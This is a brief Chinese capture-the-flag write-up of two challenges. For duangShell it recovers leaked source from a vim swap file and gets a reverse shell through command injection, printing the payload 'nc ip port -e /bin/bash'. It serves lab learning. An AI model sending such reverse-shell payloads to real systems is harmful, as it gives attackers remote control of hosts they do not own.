文章目錄
- [BSidesCF 2019]Futurella
- [BJDCTF 2nd]duangShell
- 反彈姿勢1(未成功)
- 反彈姿勢2
[BSidesCF 2019]Futurella
好久沒看過這么簡單的題目了,哇哇哇
整了個火星文,看不懂查看源代碼
[BJDCTF 2nd]duangShell
點進去發現是swp原始碼泄露
利用vim -r index.php.swp恢復檔案
這里我知道了exec函式與system類似但是沒有回顯,所以我傳入的引數girl_friend=print_r(scandir(dirname(__FILE__)))會沒有顯示
看了別人的wp,發現我們只能用反彈shell的方法了,根據提示
由于這題的環境靶機無法訪問外網,所以需要一個內網靶機來做,這里就直接用了題目中推薦的Basic中的Linux Labs,由于這臺靶機已經安裝了lamp,已指出http服務,利用xshell連接主機
反彈姿勢1(未成功)
開啟
反彈shell
不知道為啥通不了迷惑???
反彈姿勢2
post引數:nc ip port -e /bin/bash
這個靶機真垃圾
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/145420.html
標籤:其他
上一篇:關于網橋和交換機的問題
下一篇:目錄處理命令